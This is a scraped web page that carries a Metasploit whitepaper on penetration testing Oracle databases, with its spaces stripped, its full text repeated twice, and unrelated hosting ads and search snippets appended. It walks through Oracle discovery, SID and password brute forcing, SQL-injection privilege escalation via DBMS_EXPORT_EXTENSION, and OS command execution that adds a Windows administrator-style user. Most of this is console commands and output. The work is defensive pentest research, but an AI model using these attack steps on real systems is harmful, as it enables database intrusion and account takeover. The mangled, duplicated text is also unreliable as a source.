commandsnetuser
netuser 时间:2021-04-18 阅读:()
OraclePenetrationTestingUsingtheMetasploitFrameworkChrisGates&MarioCeballosMetasploitProjectAbstractOvertheyearstherehavebeentonsofOracleexploits,SQLInjectionvulnerabilities,andpostexploitationtricksandtoolsthathadnoorder,methodology,orstandardization,mainlyjustrandom.
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
- commandsnetuser相关文档
- daynetuser
- canetuser
- 2015年本科生毕业论文检测系统启用说明
- Audionetuser
- correctednetuser
- Periodicallynetuser
数脉科技:六月优惠促销,免备案香港物理服务器,E3-1230v2处理器16G内存,350元/月
数脉科技六月优惠促销发布了!数脉科技对香港自营机房的香港服务器进行超低价促销,可选择30M、50M、100Mbps的优质bgp网络。更大带宽可在选购时选择同样享受优惠,目前仅提供HKBGP、阿里云产品,香港CN2、产品优惠码续费有效,仅限新购,每个客户可使用于一个订单。新客户可以立减400元,或者选择对应的机器用相应的优惠码,有需要的朋友可以尝试一下。点击进入:数脉科技官方网站地址数脉科技是一家成...
hostyun评测香港原生IPVPS
hostyun新上了香港cloudie机房的香港原生IP的VPS,写的是默认接入200Mbps带宽(共享),基于KVM虚拟,纯SSD RAID10,三网直连,混合超售的CN2网络,商家对VPS的I/O有大致100MB/S的限制。由于是原生香港IP,所以这个VPS还是有一定的看头的,这里给大家弄个测评,数据仅供参考!9折优惠码:hostyun,循环优惠内存CPUSSD流量带宽价格购买1G1核10G3...
免费注册宝塔面板账户赠送价值3188礼包适合购买抵扣折扣
对于一般的用户来说,我们使用宝塔面板免费版本功能还是足够的,如果我们有需要付费插件和专业版的功能,且需要的插件比较多,实际上且长期使用的话,还是购买付费专业版或者企业版本划算一些。昨天也有在文章中分享年中促销活动。如今我们是否会发现,我们在安装宝塔面板后是必须强制我们登录账户的,否则一直有弹出登录界面,我们还是注册一个账户比较好。反正免费注册宝塔账户还有代金券赠送。 新注册宝塔账户送代金券我们注册...
netuser为你推荐
-
诊断snswordpress模板wordpress高手进,我是新手,不知道下载的模板应该放在wordpress的那个地方.请高手指点.谢谢iproute两个独立局域网 互相访问。怎么做。波音737起飞爆胎飞机会爆胎?internetexplorer无法打开Internet Explorer无法打开站点怎么解决flashfxp下载我想下载一个FlashFXP 4.0.0 Build 1510 简体中文版的软件,可是不知道下载地址,希望大家帮帮我?ipad代理想买个ipad,3000至4000元左右有什么好的资费标准联通所有套餐介绍银花珠树晓来看晚来天欲雪,能饮一杯无。相似的句子中国保健养猪网猪场基本保健包括哪些方面?